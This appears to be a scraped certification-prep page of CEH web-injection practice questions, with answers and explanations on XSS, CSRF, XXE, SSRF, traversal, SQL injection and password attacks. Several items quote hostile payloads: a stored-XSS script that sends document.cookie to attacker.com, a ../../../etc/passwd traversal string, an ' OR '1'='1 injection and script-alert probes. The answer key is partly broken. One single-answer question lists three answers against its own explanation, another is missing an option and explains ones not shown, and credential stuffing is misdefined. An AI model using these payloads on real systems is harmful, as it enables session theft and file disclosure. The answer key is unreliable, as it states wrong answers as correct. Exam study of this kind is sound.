HTTP/1.1…","url":"https://courseiva.com/questions/ec-council/ec-ceh/an-analyst-reviews-a-web-server-log-and-sees-the-following-r-vknfi"},{"@type":"ListItem","position":15,"name":"An attacker attempts to exploit a web application by sending a request that triggers the server to make an internal HTTP…","url":"https://courseiva.com/questions/ec-council/ec-ceh/an-attacker-attempts-to-exploit-a-web-application-by-sending-ta4mf"},{"@type":"ListItem","position":16,"name":"Which of the following tools is specifically designed to automate the process of detecting and exploiting SQL injection …","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-of-the-following-tools-is-specifically-designed-to-aut-xkfap"},{"@type":"ListItem","position":17,"name":"During a penetration test, you identify a parameter in a web application that appears to fetch a file from the server. Y…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-penetration-test-you-identify-a-parameter-in-a-web-g8aef"},{"@type":"ListItem","position":18,"name":"Which THREE of the following are valid defenses against CSRF attacks? (Select 3)","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-three-of-the-following-are-valid-defenses-against-csrf-yqomn"},{"@type":"ListItem","position":19,"name":"Which THREE of the following are effective mitigation techniques against Cross-Site Scripting (XSS) attacks?","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-three-of-the-following-are-effective-mitigation-techni-z1amt"},{"@type":"ListItem","position":20,"name":"A penetration tester discovers that a web application's login page does not enforce rate limiting and several usernames …","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-penetration-tester-discovers-that-a-web-application-s-logi-m4drw"},{"@type":"ListItem","position":21,"name":"A security analyst notices that the web application returns different response times when querying user IDs. For example…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-security-analyst-notices-that-the-web-application-returns-ykf1w"},{"@type":"ListItem","position":22,"name":"During a security assessment, a tester discovers an endpoint that reflects the 'User-Agent' header in the response witho…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-security-assessment-a-tester-discovers-an-endpoint-r4lzn"}]}
CCNA Ceh Web Injection Questions
22 of 172 questions · Page 3/3 · Ceh Web Injection topic · Answers revealed
A web application is vulnerable to XML External Entity (XXE) injection. Which THREE of the following are potential impacts of successfully exploiting an XXE vulnerability?
Select 3 answers
A.SQL injection
B.Arbitrary file read on the server
C.Denial of Service (DoS)
D.Server-Side Request Forgery (SSRF)
E.Remote code execution via command injection
AnswersB, C, D
XXE allows reading files via external entities.
Why this answer
XXE can be used for reading local files (e.g., /etc/passwd), performing SSRF by making the server issue requests, and causing denial of service (e.g., billion laughs attack).
Which of the following is the BEST defense against brute-force attacks on a login form?
A.Rate limiting on the login endpoint
B.CAPTCHA
C.Complex password policy
D.Account lockout after 5 failed attempts
AnswerA, B, D
Rate limiting reduces the speed of brute-force attempts, but account lockout is a more specific defense.
Why this answer
Rate limiting on the login endpoint is the best defense because it directly restricts the number of requests an attacker can send over a given time window, making brute-force attacks impractical. Unlike reactive measures like account lockout, rate limiting proactively throttles traffic at the network or application layer, preventing the attacker from even attempting many guesses. This approach is effective against distributed brute-force attacks where lockout policies can be bypassed by rotating IP addresses.
Exam trap
EC-Council often tests the misconception that account lockout is the strongest defense, but the trap here is that lockout can be circumvented by distributed attacks or cause denial of service, whereas rate limiting is a proactive, scalable control that works at the protocol level.
How to eliminate wrong answers
Option B (CAPTCHA) is wrong because while it can slow down automated attacks, it is not the best defense as it can be bypassed using OCR, machine learning, or third-party solving services, and it degrades user experience. Option C (Complex password policy) is wrong because it only increases the password search space but does not prevent brute-force attempts; attackers can still try millions of combinations over time. Option D (Account lockout after 5 failed attempts) is wrong because it is a reactive measure that can be exploited for denial-of-service attacks against legitimate users, and attackers can bypass it by using many different usernames or IP addresses in a distributed brute-force attack.
A security analyst is reviewing a web application log and sees the following request: GET /page?file=../../../etc/passwd HTTP/1.1. Which TWO vulnerabilities are most likely being attempted? (Select two)
Select 2 answers
A.Directory traversal
B.Remote file inclusion (RFI)
C.SQL injection
D.Local file inclusion (LFI)
E.Command injection
AnswersA, D
The '../' pattern indicates an attempt to access files outside the web root.
Why this answer
The request uses '../' to traverse directories (directory traversal) and attempts to read the /etc/passwd file, which is also a local file inclusion (LFI) attempt if the application includes files.
A penetration tester is assessing a web application and notices that the application reflects the User-Agent header in the response body without sanitization. What attack could be performed using this behavior?
A.Cross-Site Scripting (XSS)
B.Directory traversal
C.Server-Side Request Forgery (SSRF)
D.SQL injection
AnswerA
Reflecting user input (User-Agent) without sanitization allows XSS.
Why this answer
Reflecting unsanitized input in HTTP headers can lead to reflected XSS.
A web application uses cookies for session management. The application is vulnerable to CSRF. Which THREE of the following are effective mitigation techniques? (Choose THREE.)
B.Using HTTP GET requests for state-changing operations
C.Setting SameSite cookies to Lax or Strict
D.Including a unique CSRF token in each request
E.Validating the Origin or Referer header
AnswersC, D, E
SameSite attribute prevents cookies from being sent in cross-site requests.
Why this answer
SameSite cookies restrict cross-origin requests. CSRF tokens provide a unique per-request secret. Custom headers (e.g., X-Requested-With) can be checked by the server.
Double Submit Cookies can also be used but is less common. MFA does not prevent CSRF.
In Burp Suite, which tool is used to modify and resend individual HTTP requests to observe responses, allowing manual testing of input validation and parameter manipulation?
A.Repeater
B.Proxy
C.Scanner
D.Intruder
AnswerA
Repeater allows sending and resending individual requests with manual modifications.
Why this answer
Burp Repeater is designed for manually crafting and resending requests to see individual responses, ideal for testing parameter handling.
During a penetration test, a tester observes that a web application's login form does not implement rate limiting and returns different error messages for valid vs invalid usernames. Which THREE attacks are most likely to be successful? (Select three)
Select 3 answers
A.Directory traversal
B.Credential stuffing
C.Brute-force attack
D.SQL injection
E.Password spraying
AnswersB, C, E
Valid usernames can be used with breached password lists.
Why this answer
With username enumeration and no rate limiting, brute force (trying many passwords on one user), credential stuffing (using breached credentials), and password spraying (trying common passwords across many users) are all viable. SQL injection is not directly related to the described conditions.
After a security incident, logs show repeated login attempts from different IP addresses using a list of common passwords against a single username. Which attack technique is being used?
A.Credential stuffing
B.Brute force attack
C.Password spraying
D.Dictionary attack
AnswerC
Password spraying uses a few common passwords against many accounts or single account from many IPs.
Why this answer
Password spraying uses a small set of common passwords against many accounts or, as in this case, against a single account from multiple IPs to avoid lockout.
A security analyst notices that after submitting a form on a web application, the URL changes to include the user's ID parameter, e.g., 'user?id=123'. The analyst modifies the ID in the URL and accesses another user's profile without authorization. Which type of vulnerability is being exploited?
A.Reflected Cross-Site Scripting (XSS)
B.Command Injection
C.Cross-Site Request Forgery (CSRF)
D.Insecure Direct Object Reference (IDOR)
AnswerD
IDOR occurs when an application exposes references (e.g., user ID) and fails to verify authorization, allowing attackers to access other objects.
Why this answer
This is an Insecure Direct Object Reference (IDOR) vulnerability, where the application exposes internal object references (like user IDs) without proper access control checks.
A security analyst observes that a web application allows users to submit feedback, and after submission, the feedback is displayed on a public page. An attacker submits feedback containing the script: <script>document.location='http://attacker.com/?c='+document.cookie</script>. When an admin views the public page, the script executes. Which type of attack occurred?
A.Reflected XSS
B.Cross-site request forgery (CSRF)
C.DOM-based XSS
D.Stored XSS
AnswerD
The malicious script is stored in the feedback database and executed when the admin retrieves it.
Why this answer
The script is stored on the server (feedback) and executed when the admin views the page. This is persistent (stored) XSS.
An analyst reviews a web server log and sees the following request: GET /search?q=<script>alert('xss')</script> HTTP/1.1. The response from the server includes the search term inside a <div> tag without any sanitization. Which type of XSS vulnerability does this indicate?
A.Stored XSS
B.Reflected XSS
C.DOM-based XSS
D.Blind XSS
AnswerB
The script is injected via a URL parameter and immediately reflected in the server's response, which is the definition of reflected XSS.
Why this answer
This is a typical reflected XSS because the malicious script is injected via a GET parameter and immediately reflected in the response without persistent storage.
An attacker attempts to exploit a web application by sending a request that triggers the server to make an internal HTTP request to a sensitive internal service. Which type of attack is this?
A.CSRF
B.XXE
C.SSRF
D.IDOR
AnswerC
SSRF involves the server making unintended requests to internal or external systems.
Why this answer
SSRF (Server-Side Request Forgery) occurs when an attacker can induce the server to make requests to internal resources.
Which of the following tools is specifically designed to automate the process of detecting and exploiting SQL injection vulnerabilities in web applications?
A.Burp Suite
B.Metasploit
C.SQLMap
D.Nmap
AnswerC
SQLMap is the standard tool for automated SQL injection detection and exploitation.
Why this answer
SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection flaws. It supports a wide range of database backends and injection techniques, making it the go-to tool for this specific task.
Exam trap
EC-Council often tests the distinction between general-purpose security tools (like Burp Suite or Metasploit) and specialized automation tools (like SQLMap), leading candidates to choose a tool they recognize for web testing rather than the one specifically designed for SQL injection automation.
How to eliminate wrong answers
Option A is wrong because Burp Suite is an intercepting proxy and web application security testing platform that requires manual configuration or extensions to automate SQL injection exploitation; it is not purpose-built for automated SQL injection detection and exploitation. Option B is wrong because Metasploit is a framework for developing and executing exploit code against remote targets, but it does not natively automate the detection and exploitation of SQL injection vulnerabilities in web applications without additional modules or manual scripting. Option D is wrong because Nmap is a network scanning tool used for host discovery, port scanning, and service enumeration, and it lacks any capability to detect or exploit SQL injection vulnerabilities.
During a penetration test, you identify a parameter in a web application that appears to fetch a file from the server. You modify the parameter to '../../../etc/passwd' and see the contents of the passwd file. Which type of vulnerability is this?
A.Remote File Inclusion (RFI)
B.Directory traversal
C.Server-Side Request Forgery (SSRF)
D.Local File Inclusion (LFI)
AnswerB
The attacker is traversing directories to read arbitrary files, which is directory traversal.
Why this answer
The use of '../' sequences to traverse directories and access files outside the web root is classic directory traversal.
A penetration tester discovers that a web application's login page does not enforce rate limiting and several usernames are known from a prior data breach. The tester wants to try a few common passwords across many accounts to avoid account lockouts. Which attack technique is being used?
A.Password spraying
B.Credential stuffing
C.Brute force attack
D.Dictionary attack
AnswerA
Password spraying uses a few passwords across many accounts to avoid lockouts.
Why this answer
Password spraying involves trying a small number of common passwords against many user accounts to avoid account lockout. This contrasts with credential stuffing (using many passwords per account) and brute force (many passwords per user).
A security analyst notices that the web application returns different response times when querying user IDs. For example, a valid user ID returns the page in 2 seconds, while an invalid ID returns in 0.5 seconds. The analyst suspects a blind SQL injection vulnerability. Which SQL injection technique is MOST likely being used?
A.Error-based SQL injection
B.Union-based SQL injection
C.Time-based blind SQL injection
D.Out-of-band SQL injection
AnswerC
Time-based uses conditional delays to infer Boolean results; response time differences are the key indicator.
Why this answer
Time-based blind SQL injection relies on causing a time delay (e.g., via SLEEP or WAITFOR DELAY) to infer the truth of conditions. The varying response times (2s vs 0.5s) indicate a time-based attack.
During a security assessment, a tester discovers an endpoint that reflects the 'User-Agent' header in the response without sanitization. The tester wants to confirm a reflected XSS vulnerability. Which of the following payloads would be MOST effective to demonstrate the issue in a single request?
A.Set the User-Agent to: <img src=x onerror=alert(1)>
B.Set the User-Agent to: ' OR '1'='1
C.Set the User-Agent to: <script>alert('XSS')</script>
D.Set the User-Agent to: ../../../../etc/passwd
AnswerC
This payload will execute JavaScript if the User-Agent is reflected unsanitized, proving the vulnerability.
Why this answer
Using a simple script alert like <script>alert(1)</script> is a standard proof-of-concept for reflected XSS. The exact payload may vary, but it must execute JavaScript. The simplest is an alert.